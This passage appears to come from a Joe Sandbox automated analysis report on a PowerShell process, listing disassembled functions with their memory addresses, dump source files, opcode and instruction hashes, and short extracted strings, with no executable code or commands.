                                            • Opcode Fuzzy Hash: 71a90996fca477f148468143899b3cd89a878cac2b304db5b8e5761a3463a530
                                            • Instruction Fuzzy Hash: 94B1D73060DA4D4FDB68DF28D8657E93BD1FF59310F04426EE84DC72A6DA34A945CB82
                                            Function 00007FFD9B979358 Relevance: .3, Instructions: 269COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1876818148.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b970000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1c9daeef1a08bf65595d405b68fbfdec1263a249dfc52baae6313e9f58430243
                                            • Instruction ID: 834727abbb2d416403eb6567d27c11f532b4589d571577df8bf9bc9df947fcae
                                            • Opcode Fuzzy Hash: 1c9daeef1a08bf65595d405b68fbfdec1263a249dfc52baae6313e9f58430243
                                            • Instruction Fuzzy Hash: 2AA16D21A4F7C66FE72787B848A56607FA1DF13254B1E01EBC4D8CB1F3D919690AC362
                                            Function 00007FFD9B8A4258 Relevance: .2, Instructions: 235COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1876125725.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 154347bf71aa7972fecb76d4b0163d5d82df2a0fc8fb8283f0f465328881590f
                                            • Instruction ID: eb28aa717efce4dd0372d7319239f994e18d742002241ab9150f625e609fb110
                                            • Opcode Fuzzy Hash: 154347bf71aa7972fecb76d4b0163d5d82df2a0fc8fb8283f0f465328881590f
                                            • Instruction Fuzzy Hash: 2C61383160E7894FDB56DB2CD8A19A17BE0EF5732070902EFD0C9CB1A3D915A847C751
                                            Function 00007FFD9B97A7BA Relevance: .2, Instructions: 224COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1876818148.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b970000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aa44fcb3469c86f2f8233340159c42a66ccf1153b48e349e1ea0263a232cffbf
                                            • Instruction ID: 33244284900f1d78acb4376eb81c3d028a3f31c9342f2027a1da50688a41ced1
                                            • Opcode Fuzzy Hash: aa44fcb3469c86f2f8233340159c42a66ccf1153b48e349e1ea0263a232cffbf
                                            • Instruction Fuzzy Hash: 1661C521B0E7CD5FEB629B6848A55A47FF1EF56210B0A01FBC098CB1E3D918A946C352
                                            Function 00007FFD9B975852 Relevance: .1, Instructions: 108COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1876818148.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b970000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b7654edd503bfcaef29485b0e539ad420ce247e278380addbc9318d744cb40c4
                                            • Instruction ID: 3e57f2b80edf975ac02b07342ccc3d5f21ee202eb2211ba74e79163e45474f0d
                                            • Opcode Fuzzy Hash: b7654edd503bfcaef29485b0e539ad420ce247e278380addbc9318d744cb40c4
                                            • Instruction Fuzzy Hash: 7E31C222F2FA9A5BF7F597A828B51B867C1EF55264B5A00FAD45DCB1E3ED085C008342
                                            Function 00007FFD9B974914 Relevance: .1, Instructions: 97COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1876818148.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b970000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9243ae22cc4a76ec54e2b514f5e597d9b03ec126a1f67874c0d7f62a72d469ab
                                            • Instruction ID: 205d691e195e6eaa92a4cc157b5592ccdd808b4ff860f1d64db406a95ea29163
                                            • Opcode Fuzzy Hash: 9243ae22cc4a76ec54e2b514f5e597d9b03ec126a1f67874c0d7f62a72d469ab
                                            • Instruction Fuzzy Hash: F821F722B2FA5D1BF7B9966854F137863C2EF81A50B5900BED05CC73E3EE19AC014341
                                            Function 00007FFD9B8AB734 Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1876125725.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4bb8cc459561c7da288726024136b4c8358b1f5bcbb9f637177e07c7f181ebf8
                                            • Instruction ID: 49c5f3564240f89d5451a4bd65d27264b8f91018677010d5aa95e4aecef72d68
                                            • Opcode Fuzzy Hash: 4bb8cc459561c7da288726024136b4c8358b1f5bcbb9f637177e07c7f181ebf8
                                            • Instruction Fuzzy Hash: D531E430A1964ECEFBB49F64CC25BF532D4FF49359F410539D40D861A2DA787A85CB21
                                            Function 00007FFD9B9719AF Relevance: .1, Instructions: 80COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1876818148.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b970000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 60cc465741fa094d76229b741c20f0b21eb2cc3995d0acfcd9f3cc51b7c5d0d4
                                            • Instruction ID: a5d5974e4d4e79deaad17eeba5fe421197b8138500a76f009b68a99af8e23f5e
                                            • Opcode Fuzzy Hash: 60cc465741fa094d76229b741c20f0b21eb2cc3995d0acfcd9f3cc51b7c5d0d4
                                            • Instruction Fuzzy Hash: D3213452F1F7DA1FE365A67828B91B42BD1EF66654B1A40FFD099CB1E3DC085C0A8312
                                            Function 00007FFD9B8A41E5 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1876125725.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                            • Instruction ID: e10b541529c43b5a05961ecc039e05026d96ff9cbebd8ef02b3c2eff407cc088
                                            • Opcode Fuzzy Hash: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                            • Instruction Fuzzy Hash: 9101677121CB0C8FDB48EF4CE451AA5B7E0FB99364F10056EE58AC36A5D636E882CB45
                                            Function 00007FFD9B977C1A Relevance: .0, Instructions: 37COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1876818148.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b970000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f22b0e381957c6cae2698d685ad50fa276d456b5bd86ddc9807bd5bd7b0724be
                                            • Instruction ID: a141602813fe85bd2874b9a0e95abf9af195e8533e912e5cf8ba20ef56759f9e
                                            • Opcode Fuzzy Hash: f22b0e381957c6cae2698d685ad50fa276d456b5bd86ddc9807bd5bd7b0724be
                                            • Instruction Fuzzy Hash: 1DF0E533B5DA0D0EE799966C68591F573C2DFC8131B590177C15EC31A6ED15D8064341

                                            Executed Functions

                                            Function 046BF320 Relevance: .3, Instructions: 281COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1106842eb91c7cbd30d5c29ba51f03a6a8002e12223d7c2132e27e1cbf771ace
                                            • Instruction ID: 5fd3e4164c832bd90d1f9877b8d5cbc4c5e466c030aa2a2de7de0cf9ee39fcc3
                                            • Opcode Fuzzy Hash: 1106842eb91c7cbd30d5c29ba51f03a6a8002e12223d7c2132e27e1cbf771ace
                                            • Instruction Fuzzy Hash: 43B15E70E002098FDB18CFA9D9857DEBBF2AF48314F148529D855E7364FB74A896CB81
                                            Function 046BFBF0 Relevance: .3, Instructions: 266COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8545bbc1e71502ce9af158a317cf822215c1c5336856536311075aac4f391cab
                                            • Instruction ID: 67db34afbc43c8dc67779e50ea876cb2973213b8832b741cbe8b222dbb27652c
                                            • Opcode Fuzzy Hash: 8545bbc1e71502ce9af158a317cf822215c1c5336856536311075aac4f391cab
                                            • Instruction Fuzzy Hash: 3EB13E70E002099FDB14CFA9DD857DEBBF2AB48314F148529E855E7364FB74A885CB81
                                            Function 073E81B0 Relevance: 23.2, Strings: 18, Instructions: 686COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                            • API String ID: 0-81657163
                                            • Opcode ID: 98d1f78f93cd958fdc3bde9049dfc151c803b2f160d996c9d1e7b4d329e8562c
                                            • Instruction ID: 0203feaf22d987ef88f93ae2c61385824405ec4ae6066d0648f290058174eb7d
                                            • Opcode Fuzzy Hash: 98d1f78f93cd958fdc3bde9049dfc151c803b2f160d996c9d1e7b4d329e8562c
                                            • Instruction Fuzzy Hash: DE324BB1F00229CFEB158F6984546EABBEAAF85310F14847AD909DF3D1DB32D845C7A1
                                            Function 073E68C0 Relevance: 15.8, Strings: 12, Instructions: 785COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                            • API String ID: 0-242022331
                                            • Opcode ID: cc6f75520df9086768c23c9039e2f08c2ed18c21a095086eb1fb2d410e532994
                                            • Instruction ID: 4a644f043786dc253dd432c8e4a9fe95574db104fc909d3f4146107aeb26d140
                                            • Opcode Fuzzy Hash: cc6f75520df9086768c23c9039e2f08c2ed18c21a095086eb1fb2d410e532994
                                            • Instruction Fuzzy Hash: 0E62A3B4A00219DFEB14CB58C955B9EBBB6BF84304F1084A9D9096F395CB31ED86CF91
                                            Function 073E54D8 Relevance: 13.3, Strings: 10, Instructions: 792COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f+l$(f+l$(f+l$(f+l$(f+l$(f+l$4'^q$4'^q$4'^q$4'^q
                                            • API String ID: 0-4281883174
                                            • Opcode ID: e018da3077acb458ff8c27036ce0c36d1ee7924395f101d5283b2c7e3b5f7471
                                            • Instruction ID: 36bf0189fa7259667425e1f3428933d4e0b4825ecaacc8890f4b966faecc1eb7
                                            • Opcode Fuzzy Hash: e018da3077acb458ff8c27036ce0c36d1ee7924395f101d5283b2c7e3b5f7471
                                            • Instruction Fuzzy Hash: 2D6280B4B00218DFE714CB98C855E9ABBB6BF84308F14C069D909AF395CB72EC55CB91
                                            Function 073E30C8 Relevance: 11.6, Strings: 9, Instructions: 366COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$84)l$84)l$tP^q$tP^q$$^q$$^q$$^q
                                            • API String ID: 0-2873740239
                                            • Opcode ID: fbbf67962f9bd54aefd2c181261dccd49181c6417aa1443c2862f00815d5558d
                                            • Instruction ID: bb250d07f9049c032b4089cac6f7c8d30dd4f0da1066011f29f1618a75ed4d44
                                            • Opcode Fuzzy Hash: fbbf67962f9bd54aefd2c181261dccd49181c6417aa1443c2862f00815d5558d
                                            • Instruction Fuzzy Hash: 37C139B0A093999FD7168B29C854A6ABFFAAF86210F19C4DBD448CF2D2CB31DC45C751
                                            Function 073E54BB Relevance: 5.6, Strings: 4, Instructions: 602COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f+l$(f+l$4'^q$4'^q
                                            • API String ID: 0-2018738063
                                            • Opcode ID: dad2c90aee51a4743f8415c6c632ea3423dbb132ea261d07aef3f4d022b42d21
                                            • Instruction ID: a0546fc4f953e21e35745b9f73b1d3ab019b9f3eddd54c3c6d8a0b2b6b5ff9e6
                                            • Opcode Fuzzy Hash: dad2c90aee51a4743f8415c6c632ea3423dbb132ea261d07aef3f4d022b42d21
                                            • Instruction Fuzzy Hash: 30426DB4B10215DFE710CF98C855E9ABBB6BB88318F14C059D909AF395CB72EC56CB81
                                            Function 073E6F3B Relevance: 5.4, Strings: 4, Instructions: 395COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f+l$(f+l$4'^q$4'^q
                                            • API String ID: 0-2018738063
                                            • Opcode ID: b58c105e6f5b39c5b866b24d579c5e28f01b84236d14b5ccf36ac7af1b81a693
                                            • Instruction ID: c3559eac984a990db6065696a6e0276ea588246fb71c4440640c0be0910b207f
                                            • Opcode Fuzzy Hash: b58c105e6f5b39c5b866b24d579c5e28f01b84236d14b5ccf36ac7af1b81a693
                                            • Instruction Fuzzy Hash: 56F1E5B4A002199FE724DB68CD51FAEBBB3AB84344F1080A9D9096F395DB71DD818F91
                                            Function 046BB830 Relevance: 4.3, Strings: 3, Instructions: 517COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Hbq$$^q$$^q
                                            • API String ID: 0-1611274095
                                            • Opcode ID: 6f355bb98992fd04d273955fe61eb9a9f8eeef2840272204e1c62219956af97d
                                            • Instruction ID: 341ce90525f99fb105bc875f2b0862c73650b487387e23adbe734b60369fd906
                                            • Opcode Fuzzy Hash: 6f355bb98992fd04d273955fe61eb9a9f8eeef2840272204e1c62219956af97d
                                            • Instruction Fuzzy Hash: 78225030B002148FDB25DF24C854AEEB7B6EF89704F1445A9D44AAB361DF35AE86CF90
                                            Function 073E5D2E Relevance: 4.2, Strings: 3, Instructions: 482COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f+l$4'^q$4'^q
                                            • API String ID: 0-2994860849
                                            • Opcode ID: ff42abcfb1c3322f670d74c0e4857ad06a61da7e9463e45bcfa35dba1bdfce40
                                            • Instruction ID: 592d5e453fa21bbd7a775ccef0933b6ef76968112124187dd5c96eae65503f8f
                                            • Opcode Fuzzy Hash: ff42abcfb1c3322f670d74c0e4857ad06a61da7e9463e45bcfa35dba1bdfce40
                                            • Instruction Fuzzy Hash: AE127CB4B10219DFE710CF98C895E9ABBB6BB84308F14C059D9096F395CB76EC56CB81
                                            Function 073E8AC0 Relevance: 4.0, Strings: 3, Instructions: 285COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$$^q
                                            • API String ID: 0-953868773
                                            • Opcode ID: 830d224f777180cedb983574962dd1179e0dbe1b49c0fb2e19d5766750ada88e
                                            • Instruction ID: ca8766ce7c0519d90440b23de7746fba7ccdac4d9820e5553e57feeb073d2d0c
                                            • Opcode Fuzzy Hash: 830d224f777180cedb983574962dd1179e0dbe1b49c0fb2e19d5766750ada88e
                                            • Instruction Fuzzy Hash: D99180F0F043298FEB158B7885506AABBEA9F86200F1484BAD549DF3D1DA31DC85C791
                                            Function 073E7910 Relevance: 4.0, Strings: 3, Instructions: 260COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$4'^q
                                            • API String ID: 0-1196845430
                                            • Opcode ID: e717a5b1395519fa0b73ea56b41bd130d67e12972d9ddeeabf88dd6b3d6d842d
                                            • Instruction ID: e220d5017a7699dfa6d93fc35a1f80040243b9114cf286e82c6d43c2abafd1f7
                                            • Opcode Fuzzy Hash: e717a5b1395519fa0b73ea56b41bd130d67e12972d9ddeeabf88dd6b3d6d842d
                                            • Instruction Fuzzy Hash: 84A190B4A102199FEB14CB54C541B9EBBB7AF88314F10C469E9097F395CB31EC85CB91
                                            Function 073E790E Relevance: 4.0, Strings: 3, Instructions: 258COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$4'^q
                                            • API String ID: 0-1196845430
                                            • Opcode ID: 286fe8b14f557753901c939cfdce0b35bc0d20d8d543e38b05924404b19c55a5
                                            • Instruction ID: 502807cd64b3d98d49c7bd56e05ab6c302acffdf517ebf3fe16ace9d6182f63c
                                            • Opcode Fuzzy Hash: 286fe8b14f557753901c939cfdce0b35bc0d20d8d543e38b05924404b19c55a5
                                            • Instruction Fuzzy Hash: 1DA19FB4A002199FEB14CB54C541B9EBBBBAF88314F10C469E9097F395CB31EC86CB91
                                            Function 073E1020 Relevance: 3.8, Strings: 3, Instructions: 94COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $^q$$^q$$^q
                                            • API String ID: 0-831282457
                                            • Opcode ID: 30e02cedad4fb8e047d767cb1e4f9d57e74210fee4b2b281c003f824e79e6110
                                            • Instruction ID: 3b3ba585583c4afb9006f11ef72ed81a8292186f467f5e2247f2bae08a87a074
                                            • Opcode Fuzzy Hash: 30e02cedad4fb8e047d767cb1e4f9d57e74210fee4b2b281c003f824e79e6110
                                            • Instruction Fuzzy Hash: 802149B17103AE9BFB34456A9C40B27B69E5BC0714F34842AE50DDB3C5CD76DC448322
                                            Function 073E5130 Relevance: 2.7, Strings: 2, Instructions: 247COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f+l$(f+l
                                            • API String ID: 0-1421956851
                                            • Opcode ID: 6325a52275a36310ceef0632fec214ea01f0cfbf679bcda5385d246a51f188f0
                                            • Instruction ID: b6e329847f90babff2bb2053c5a5a80dd65c510c84a4df6191259f7f56a35be8
                                            • Opcode Fuzzy Hash: 6325a52275a36310ceef0632fec214ea01f0cfbf679bcda5385d246a51f188f0
                                            • Instruction Fuzzy Hash: 269196F4B002189FEB14DB58C945B9EBBA7AF88308F108468D9047F795CB76EC51CB91
                                            Function 073E100E Relevance: 2.6, Strings: 2, Instructions: 73COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $^q$$^q
                                            • API String ID: 0-355816377
                                            • Opcode ID: 55b50b591c74985fc43de85ad4dd8f360ba13cb778c5d1097154cb45df28b061
                                            • Instruction ID: f146e388425a77e0998f9261affeeca37d77b2a371df178c18f6ccb030014573
                                            • Opcode Fuzzy Hash: 55b50b591c74985fc43de85ad4dd8f360ba13cb778c5d1097154cb45df28b061
                                            • Instruction Fuzzy Hash: AD1136F13043ED6BFB3045264D40B677BAD4B81610F248027E948DB2D6C9398C84C323
                                            Function 073E5111 Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f+l
                                            • API String ID: 0-988561221
                                            • Opcode ID: 9257475e44303eda608d3000270a9304f093561c98d39eb1c91bd905fc398529
                                            • Instruction ID: 7cb9ebf9bd9c45a5d4e4ffc9ddade8691738a7d6e901d9fe235b429fa25bf061
                                            • Opcode Fuzzy Hash: 9257475e44303eda608d3000270a9304f093561c98d39eb1c91bd905fc398529
                                            • Instruction Fuzzy Hash: FD91A5F4B00219AFEB14CB54C941B9EBBB6AF89308F148069D9087F791CB76EC51CB91
                                            Function 073E8AA5 Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q
                                            • API String ID: 0-1614139903
                                            • Opcode ID: 6826f3f89a1de3701b24a8e32f0a6250d9c0193a07bfdcaaf42ca722f2e8c0b8
                                            • Instruction ID: 627bc0993331f44cdae173491154030846ba26ee68c8c92da10f3b3e58792fad
                                            • Opcode Fuzzy Hash: 6826f3f89a1de3701b24a8e32f0a6250d9c0193a07bfdcaaf42ca722f2e8c0b8
                                            • Instruction Fuzzy Hash: 404137F0F00326DFEB148F748680BEABBEEAF85240F1994A5C9489B391D731D881C791
                                            Function 046B4A88 Relevance: .3, Instructions: 335COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6f1038fbe50525175073faef88963be8f282661fea925e7426039040ae04f260
                                            • Instruction ID: 193caac2b1712a07533b9a055f4dd301af23fbf3ee0614c69bfa953922dac1b5
                                            • Opcode Fuzzy Hash: 6f1038fbe50525175073faef88963be8f282661fea925e7426039040ae04f260
                                            • Instruction Fuzzy Hash: 6BD12A74A00219AFDB15CF98D584ADDFBB2FF48310F248559E845AB366DB31ED82CB90
                                            Function 046B39A8 Relevance: .3, Instructions: 327COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dcceacc8e0b8faff2c317386bb6e037f7c417aa19dee77ea69f9b9afd128de7d
                                            • Instruction ID: c217861c934e294fed52983b5416b54752c0d55f27ad64f214ec3d685b4ef379
                                            • Opcode Fuzzy Hash: dcceacc8e0b8faff2c317386bb6e037f7c417aa19dee77ea69f9b9afd128de7d
                                            • Instruction Fuzzy Hash: 26D10574A00209AFDB05CF98D584AEDFBB2FF48310F258559E849AB365D731ED82CB90
                                            Function 046B9180 Relevance: .3, Instructions: 318COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 29866b6b1641629a3cb95d60ad1e07de1c5fc6b64f883cbe10ae08ddcff72db7
                                            • Instruction ID: 3e098861587b5b1e3a53eb9a3386607550af491a9f69b62221fad59660442e18
                                            • Opcode Fuzzy Hash: 29866b6b1641629a3cb95d60ad1e07de1c5fc6b64f883cbe10ae08ddcff72db7
                                            • Instruction Fuzzy Hash: 55C1BE71B002089FDB14DFA4C994A9DBBB2FF85314F158568E546AF365EB34EC89CB80
                                            Function 046BF314 Relevance: .3, Instructions: 286COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 022ec7e8e8bbc428fb4984b442b5e505d26bc6f45cb73bd6d8c53360b5102ff8
                                            • Instruction ID: 5692db7708ba7a4bdb076cf04ecc987c5309b6a307552561405ecea641d4f9d0
                                            • Opcode Fuzzy Hash: 022ec7e8e8bbc428fb4984b442b5e505d26bc6f45cb73bd6d8c53360b5102ff8
                                            • Instruction Fuzzy Hash: CCB15C71E002098FDB18CFA8D9857DEBBF2AF48314F148129D855E7364FB74A896CB91
                                            Function 046BFBE4 Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
